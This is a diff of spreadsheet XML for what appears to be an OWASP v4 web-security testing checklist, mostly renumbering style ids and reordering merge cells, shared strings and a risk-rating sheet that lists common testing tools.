       <c r="D116" s="44" t="s">
-        <v>442</v>
+        <v>468</v>
       </c>
       <c r="E116" s="38" t="s">
         <v>123</v>
@@ -6005,7 +6012,7 @@
         <v>432</v>
       </c>
       <c r="D118" s="44" t="s">
-        <v>442</v>
+        <v>468</v>
       </c>
       <c r="E118" s="38" t="s">
         <v>123</v>
@@ -6812,19 +6819,19 @@
     </row>
   </sheetData>
   <conditionalFormatting sqref="G2">
-    <cfRule type="cellIs" dxfId="15" priority="6" operator="equal">
+    <cfRule type="cellIs" dxfId="17" priority="6" operator="equal">
       <formula>"Low"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="14" priority="7" operator="equal">
+    <cfRule type="cellIs" dxfId="16" priority="7" operator="equal">
       <formula>"Critical"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="13" priority="8" operator="equal">
+    <cfRule type="cellIs" dxfId="15" priority="8" operator="equal">
       <formula>"Note"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="12" priority="9" operator="equal">
+    <cfRule type="cellIs" dxfId="14" priority="9" operator="equal">
       <formula>"Moderate"</formula>
     </cfRule>
-    <cfRule type="cellIs" dxfId="11" priority="10" operator="equal">
+    <cfRule type="cellIs" dxfId="13" priority="10" operator="equal">
       <formula>"High"</formula>
     </cfRule>
   </conditionalFormatting>
@@ -6836,7 +6843,7 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:J26"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
+    <sheetView workbookViewId="0">
       <selection activeCell="E8" sqref="E8"/>
     </sheetView>
   </sheetViews>
@@ -6852,28 +6859,28 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.35">
-      <c r="A1" s="54" t="s">
+      <c r="A1" s="58" t="s">
         <v>8</v>
       </c>
-      <c r="B1" s="54"/>
-      <c r="C1" s="54"/>
-      <c r="D1" s="54"/>
-      <c r="E1" s="54"/>
-      <c r="F1" s="54"/>
-      <c r="G1" s="54"/>
+      <c r="B1" s="58"/>
+      <c r="C1" s="58"/>
+      <c r="D1" s="58"/>
+      <c r="E1" s="58"/>
+      <c r="F1" s="58"/>
+      <c r="G1" s="58"/>
     </row>
     <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A3" s="55" t="s">
+      <c r="A3" s="59" t="s">
         <v>9</v>
       </c>
-      <c r="B3" s="55"/>
-      <c r="C3" s="55"/>
-      <c r="D3" s="55"/>
+      <c r="B3" s="59"/>
+      <c r="C3" s="59"/>
+      <c r="D3" s="59"/>
       <c r="E3" s="2"/>
-      <c r="F3" s="55" t="s">
+      <c r="F3" s="59" t="s">
         <v>10</v>
       </c>
-      <c r="G3" s="55"/>
+      <c r="G3" s="59"/>
       <c r="I3" t="s">
         <v>11</v>
       </c>
@@ -6882,27 +6889,27 @@
       </c>
     </row>
     <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A4" s="56" t="s">
+      <c r="A4" s="60" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="56"/>
-      <c r="C4" s="56"/>
-      <c r="D4" s="56"/>
+      <c r="B4" s="60"/>
+      <c r="C4" s="60"/>
+      <c r="D4" s="60"/>
       <c r="E4" s="3"/>
-      <c r="F4" s="56" t="s">
+      <c r="F4" s="60" t="s">
         <v>14</v>
       </c>
-      <c r="G4" s="56"/>
+      <c r="G4" s="60"/>
     </row>
     <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A5" s="4" t="s">
         <v>15</v>
       </c>
-      <c r="B5" s="51" t="s">
+      <c r="B5" s="55" t="s">
         <v>61</v>
       </c>
-      <c r="C5" s="52"/>
-      <c r="D5" s="52"/>
+      <c r="C5" s="56"/>
+      <c r="D5" s="56"/>
       <c r="E5" s="5">
         <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
         <v>3</v>
@@ -6922,11 +6929,11 @@
       <c r="A6" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="B6" s="59" t="s">
+      <c r="B6" s="63" t="s">
         <v>62</v>
       </c>
-      <c r="C6" s="59"/>
-      <c r="D6" s="59"/>
+      <c r="C6" s="63"/>
+      <c r="D6" s="63"/>
       <c r="E6" s="5">
         <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
         <v>4</v>
@@ -6946,11 +6953,11 @@
       <c r="A7" s="4" t="s">
         <v>23</v>
       </c>
-      <c r="B7" s="59" t="s">
+      <c r="B7" s="63" t="s">
         <v>56</v>
       </c>
-      <c r="C7" s="59"/>
-      <c r="D7" s="59"/>
+      <c r="C7" s="63"/>
+      <c r="D7" s="63"/>
       <c r="E7" s="5">
         <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
         <v>0</v>
@@ -6970,11 +6977,11 @@
       <c r="A8" s="4" t="s">
         <v>27</v>
       </c>
-      <c r="B8" s="59" t="s">
+      <c r="B8" s="63" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="59"/>
-      <c r="D8" s="59"/>
+      <c r="C8" s="63"/>
+      <c r="D8" s="63"/>
       <c r="E8" s="5">
         <f>VLOOKUP(B8,References!G3:H8,2,FALSE)</f>
         <v>2</v>
@@ -7001,28 +7008,28 @@
       <c r="H9" s="7"/>
     </row>
     <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.2">
-      <c r="A10" s="56" t="s">
+      <c r="A10" s="60" t="s">
         <v>31</v>
       </c>
-      <c r="B10" s="56"/>
-      <c r="C10" s="56"/>
-      <c r="D10" s="56"/>
+      <c r="B10" s="60"/>
+      <c r="C10" s="60"/>
+      <c r="D10" s="60"/>
       <c r="E10" s="3"/>
-      <c r="F10" s="56" t="s">
+      <c r="F10" s="60" t="s">
         <v>32</v>
       </c>
-      <c r="G10" s="56"/>
+      <c r="G10" s="60"/>
       <c r="H10" s="3"/>
     </row>
     <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A11" s="4" t="s">
         <v>33</v>
       </c>
-      <c r="B11" s="60" t="s">
+      <c r="B11" s="54" t="s">
         <v>59</v>
       </c>
-      <c r="C11" s="60"/>
-      <c r="D11" s="60"/>
+      <c r="C11" s="54"/>
+      <c r="D11" s="54"/>
       <c r="E11" s="5">
         <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
         <v>1</v>
@@ -7042,11 +7049,11 @@
       <c r="A12" s="4" t="s">
         <v>37</v>
       </c>
-      <c r="B12" s="60" t="s">
+      <c r="B12" s="54" t="s">
         <v>70</v>
       </c>
-      <c r="C12" s="60"/>
-      <c r="D12" s="60"/>
+      <c r="C12" s="54"/>
+      <c r="D12" s="54"/>
       <c r="E12" s="5">
         <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
         <v>5</v>
@@ -7066,11 +7073,11 @@
       <c r="A13" s="4" t="s">
         <v>40</v>
       </c>
-      <c r="B13" s="60" t="s">
+      <c r="B13" s="54" t="s">
         <v>64</v>
       </c>
-      <c r="C13" s="60"/>
-      <c r="D13" s="60"/>
+      <c r="C13" s="54"/>
+      <c r="D13" s="54"/>
       <c r="E13" s="5">
         <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
         <v>4</v>
@@ -7090,11 +7097,11 @@
       <c r="A14" s="4" t="s">
         <v>44</v>
       </c>
-      <c r="B14" s="60" t="s">
+      <c r="B14" s="54" t="s">
         <v>65</v>
       </c>
-      <c r="C14" s="60"/>
-      <c r="D14" s="60"/>
+      <c r="C14" s="54"/>
+      <c r="D14" s="54"/>
       <c r="E14" s="5">
         <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
         <v>3</v>
@@ -7114,51 +7121,51 @@
       <c r="E15" s="4"/>
     </row>
     <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.25">
-      <c r="A16" s="57" t="s">
+      <c r="A16" s="61" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="53">
+      <c r="B16" s="57">
         <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
         <v>2.75</v>
       </c>
-      <c r="C16" s="53"/>
-      <c r="D16" s="53"/>
+      <c r="C16" s="57"/>
+      <c r="D16" s="57"/>
       <c r="E16" s="4"/>
-      <c r="F16" s="58" t="s">
+      <c r="F16" s="62" t="s">
         <v>49</v>
       </c>
-      <c r="G16" s="53">
+      <c r="G16" s="57">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
         <v>2.625</v>
       </c>
     </row>
     <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A17" s="57"/>
-      <c r="B17" s="53"/>
-      <c r="C17" s="53"/>
-      <c r="D17" s="53"/>
-      <c r="F17" s="58"/>
-      <c r="G17" s="53"/>
+      <c r="A17" s="61"/>
+      <c r="B17" s="57"/>
+      <c r="C17" s="57"/>
+      <c r="D17" s="57"/>
+      <c r="F17" s="62"/>
+      <c r="G17" s="57"/>
     </row>
     <row r="20" spans="1:7" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B20" s="61" t="s">
+      <c r="B20" s="51" t="s">
         <v>50</v>
       </c>
-      <c r="C20" s="61"/>
-      <c r="D20" s="61"/>
-      <c r="E20" s="62" t="str">
+      <c r="C20" s="51"/>
+      <c r="D20" s="51"/>
+      <c r="E20" s="52" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
         <v>Note</v>
       </c>
-      <c r="F20" s="62"/>
+      <c r="F20" s="52"/>
       <c r="G20" s="1"/>
     </row>
     <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.25">
-      <c r="B22" s="63" t="s">
+      <c r="B22" s="53" t="s">
         <v>51</v>
       </c>
-      <c r="C22" s="63"/>
-      <c r="D22" s="63"/>
+      <c r="C22" s="53"/>
+      <c r="D22" s="53"/>
     </row>
     <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.25">
       <c r="A23" s="9" t="s">
@@ -7237,12 +7244,6 @@
   </sheetData>
   <dataConsolidate function="varp"/>
   <mergeCells count="22">
-    <mergeCell ref="B20:D20"/>
-    <mergeCell ref="E20:F20"/>
-    <mergeCell ref="B22:D22"/>
-    <mergeCell ref="B12:D12"/>
-    <mergeCell ref="B13:D13"/>
-    <mergeCell ref="B14:D14"/>
     <mergeCell ref="B5:D5"/>
     <mergeCell ref="B16:D17"/>
     <mergeCell ref="G16:G17"/>
@@ -7259,52 +7260,58 @@
     <mergeCell ref="A10:D10"/>
     <mergeCell ref="F10:G10"/>
     <mergeCell ref="B11:D11"/>
+    <mergeCell ref="B20:D20"/>
+    <mergeCell ref="E20:F20"/>
+    <mergeCell ref="B22:D22"/>
+    <mergeCell ref="B12:D12"/>
+    <mergeCell ref="B13:D13"/>
+    <mergeCell ref="B14:D14"/>
   </mergeCells>
   <phoneticPr fontId="5" type="noConversion"/>
   <conditionalFormatting sqref="E20:F20">
-    <cfRule type="containsText" dxfId="10" priority="7" operator="containsText" text="critical">
+    <cfRule type="containsText" dxfId="12" priority="7" operator="containsText" text="critical">
       <formula>NOT(ISERROR(SEARCH("critical",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="9" priority="8" operator="containsText" text="high">
+    <cfRule type="containsText" dxfId="11" priority="8" operator="containsText" text="high">
       <formula>NOT(ISERROR(SEARCH("high",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="8" priority="9" operator="containsText" text="moderate">
+    <cfRule type="containsText" dxfId="10" priority="9" operator="containsText" text="moderate">
       <formula>NOT(ISERROR(SEARCH("moderate",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="7" priority="10" operator="containsText" text="low">
+    <cfRule type="containsText" dxfId="9" priority="10" operator="containsText" text="low">
       <formula>NOT(ISERROR(SEARCH("low",E20)))</formula>
     </cfRule>
-    <cfRule type="containsText" dxfId="6" priority="11" operator="containsText" text="Note">
+    <cfRule type="containsText" dxfId="8" priority="11" operator="containsText" text="Note">
       <formula>NOT(ISERROR(SEARCH("Note",E20)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="A24:A26 B23:D23">
-    <cfRule type="containsText" dxfId="5" priority="6" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="7" priority="6" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B23:D26 A24:A26">
-    <cfRule type="containsText" dxfId="4" priority="5" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="6" priority="5" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="C26">
-    <cfRule type="containsText" dxfId="3" priority="4" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="5" priority="4" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",C26)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="D25">
-    <cfRule type="containsText" dxfId="2" priority="3" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="4" priority="3" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",D25)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="C25">
-    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="3" priority="2" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",C25)))</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B26">
-    <cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text="&lt;">
+    <cfRule type="containsText" dxfId="2" priority="1" operator="containsText" text="&lt;">
       <formula>NOT(ISERROR(SEARCH("&lt;",B26)))</formula>
     </cfRule>
   </conditionalFormatting>

--- a/OWASPv4_Checklist.xlsx
+++ b/OWASPv4_Checklist.xlsx
@@ -1740,9 +1740,6 @@
     <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
   </si>
   <si>
-    <t>Burp Proxy, ZAP, Wfuzz,DotDotPwn</t>
-  </si>
-  <si>
     <t>Burp Proxy (Autorize), ZAP, WebScarab</t>
   </si>
   <si>
@@ -1750,6 +1747,9 @@
   </si>
   <si>
     <t>Burp Proxy, ZAP, DOMinator</t>
+  </si>
+  <si>
+    <t>Burp Proxy, ZAP, Wfuzz, DotDotPwn</t>
   </si>
 </sst>
 </file>
@@ -2171,18 +2171,6 @@
     <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="right"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
@@ -2208,47 +2196,23 @@
     <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="right"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
   <dxfs count="126">
-    <dxf>
-      <font>
-        <b val="0"/>
-        <i/>
-        <strike val="0"/>
-        <condense val="0"/>
-        <extend val="0"/>
-        <outline val="0"/>
-        <shadow val="0"/>
-        <u val="none"/>
-        <vertAlign val="baseline"/>
-        <sz val="10"/>
-        <color theme="0" tint="-0.499984740745262"/>
-        <name val="Arial"/>
-        <scheme val="none"/>
-      </font>
-      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <font>
-        <b val="0"/>
-        <i/>
-        <strike val="0"/>
-        <condense val="0"/>
-        <extend val="0"/>
-        <outline val="0"/>
-        <shadow val="0"/>
-        <u val="none"/>
-        <vertAlign val="baseline"/>
-        <sz val="10"/>
-        <color theme="0" tint="-0.499984740745262"/>
-        <name val="Arial"/>
-        <scheme val="none"/>
-      </font>
-      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
     <dxf>
       <font>
         <b/>
@@ -2575,6 +2539,24 @@
         <shadow val="0"/>
         <u val="none"/>
         <vertAlign val="baseline"/>
+        <sz val="10"/>
+        <color theme="0" tint="-0.499984740745262"/>
+        <name val="Arial"/>
+        <scheme val="none"/>
+      </font>
+      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i/>
+        <strike val="0"/>
+        <condense val="0"/>
+        <extend val="0"/>
+        <outline val="0"/>
+        <shadow val="0"/>
+        <u val="none"/>
+        <vertAlign val="baseline"/>
         <sz val="9"/>
         <color theme="0" tint="-0.499984740745262"/>
         <name val="Arial"/>
@@ -2905,6 +2887,24 @@
         </patternFill>
       </fill>
       <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i/>
+        <strike val="0"/>
+        <condense val="0"/>
+        <extend val="0"/>
+        <outline val="0"/>
+        <shadow val="0"/>
+        <u val="none"/>
+        <vertAlign val="baseline"/>
+        <sz val="10"/>
+        <color theme="0" tint="-0.499984740745262"/>
+        <name val="Arial"/>
+        <scheme val="none"/>
+      </font>
+      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
     <dxf>
       <font>
@@ -3651,14 +3651,14 @@
 </file>
 
 <file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="29">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="27">
   <autoFilter ref="A96:F99"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Cryptography" dataDxfId="28"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="27"/>
-    <tableColumn id="3" name="Description" dataDxfId="26"/>
-    <tableColumn id="4" name="Tools" dataDxfId="25"/>
-    <tableColumn id="5" name="Result" dataDxfId="24"/>
+    <tableColumn id="1" name="Cryptography" dataDxfId="26"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="25"/>
+    <tableColumn id="3" name="Description" dataDxfId="24"/>
+    <tableColumn id="4" name="Tools" dataDxfId="23"/>
+    <tableColumn id="5" name="Result" dataDxfId="22"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3666,14 +3666,14 @@
 </file>
 
 <file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="23">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="21">
   <autoFilter ref="A112:F124"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Client Side Testing" dataDxfId="22"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="21"/>
-    <tableColumn id="3" name="Description" dataDxfId="20"/>
-    <tableColumn id="4" name="Tools" dataDxfId="19"/>
-    <tableColumn id="5" name="Result" dataDxfId="18"/>
+    <tableColumn id="1" name="Client Side Testing" dataDxfId="20"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="19"/>
+    <tableColumn id="3" name="Description" dataDxfId="18"/>
+    <tableColumn id="4" name="Tools" dataDxfId="17"/>
+    <tableColumn id="5" name="Result" dataDxfId="16"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3732,8 +3732,8 @@
     <tableColumn id="1" name="Authorization Testing " dataDxfId="56"/>
     <tableColumn id="2" name="Test Name" dataDxfId="55"/>
     <tableColumn id="3" name="Description" dataDxfId="54"/>
-    <tableColumn id="4" name="Tools" dataDxfId="1"/>
-    <tableColumn id="5" name="Result" dataDxfId="53"/>
+    <tableColumn id="4" name="Tools" dataDxfId="53"/>
+    <tableColumn id="5" name="Result" dataDxfId="52"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3741,14 +3741,14 @@
 </file>
 
 <file path=xl/tables/table6.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table6" displayName="Table6" ref="A101:F110" totalsRowShown="0" headerRowDxfId="52">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table6" displayName="Table6" ref="A101:F110" totalsRowShown="0" headerRowDxfId="51">
   <autoFilter ref="A101:F110"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Business logic Testing" dataDxfId="51"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="50"/>
-    <tableColumn id="3" name="Description" dataDxfId="49"/>
-    <tableColumn id="4" name="Tools" dataDxfId="48"/>
-    <tableColumn id="5" name="Result" dataDxfId="47"/>
+    <tableColumn id="1" name="Business logic Testing" dataDxfId="50"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="49"/>
+    <tableColumn id="3" name="Description" dataDxfId="48"/>
+    <tableColumn id="4" name="Tools" dataDxfId="47"/>
+    <tableColumn id="5" name="Result" dataDxfId="46"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3756,14 +3756,14 @@
 </file>
 
 <file path=xl/tables/table7.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="9" name="Table9" displayName="Table9" ref="A63:F90" totalsRowShown="0" headerRowDxfId="46">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="9" name="Table9" displayName="Table9" ref="A63:F90" totalsRowShown="0" headerRowDxfId="45">
   <autoFilter ref="A63:F90"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Data Validation Testing" dataDxfId="45"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="44"/>
-    <tableColumn id="3" name="Description" dataDxfId="43"/>
-    <tableColumn id="4" name="Tools" dataDxfId="42"/>
-    <tableColumn id="5" name="Result" dataDxfId="41"/>
+    <tableColumn id="1" name="Data Validation Testing" dataDxfId="44"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="43"/>
+    <tableColumn id="3" name="Description" dataDxfId="42"/>
+    <tableColumn id="4" name="Tools" dataDxfId="41"/>
+    <tableColumn id="5" name="Result" dataDxfId="40"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3771,14 +3771,14 @@
 </file>
 
 <file path=xl/tables/table8.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="8" name="Table29" displayName="Table29" ref="A26:F33" totalsRowShown="0" headerRowDxfId="40">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="8" name="Table29" displayName="Table29" ref="A26:F33" totalsRowShown="0" headerRowDxfId="39">
   <autoFilter ref="A26:F33"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Identity Management Testing" dataDxfId="39"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="38"/>
-    <tableColumn id="3" name="Description" dataDxfId="37"/>
-    <tableColumn id="4" name="Tools" dataDxfId="36"/>
-    <tableColumn id="5" name="Result" dataDxfId="35"/>
+    <tableColumn id="1" name="Identity Management Testing" dataDxfId="38"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="37"/>
+    <tableColumn id="3" name="Description" dataDxfId="36"/>
+    <tableColumn id="4" name="Tools" dataDxfId="35"/>
+    <tableColumn id="5" name="Result" dataDxfId="34"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -3786,14 +3786,14 @@
 </file>
 
 <file path=xl/tables/table9.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="13" name="Table614" displayName="Table614" ref="A92:F94" totalsRowShown="0" headerRowDxfId="34">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="13" name="Table614" displayName="Table614" ref="A92:F94" totalsRowShown="0" headerRowDxfId="33">
   <autoFilter ref="A92:F94"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Error Handling" dataDxfId="33"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="32"/>
-    <tableColumn id="3" name="Description" dataDxfId="31"/>
-    <tableColumn id="4" name="Tools" dataDxfId="0"/>
-    <tableColumn id="5" name="Result" dataDxfId="30"/>
+    <tableColumn id="1" name="Error Handling" dataDxfId="32"/>
+    <tableColumn id="2" name="Test Name" dataDxfId="31"/>
+    <tableColumn id="3" name="Description" dataDxfId="30"/>
+    <tableColumn id="4" name="Tools" dataDxfId="29"/>
+    <tableColumn id="5" name="Result" dataDxfId="28"/>
     <tableColumn id="6" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
@@ -4089,8 +4089,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:F130"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A115" workbookViewId="0">
-      <selection activeCell="D119" sqref="D119"/>
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A109" workbookViewId="0">
+      <selection activeCell="D50" sqref="D50"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
@@ -4866,7 +4866,7 @@
         <v>369</v>
       </c>
       <c r="D48" s="44" t="s">
-        <v>465</v>
+        <v>468</v>
       </c>
       <c r="E48" s="24" t="s">
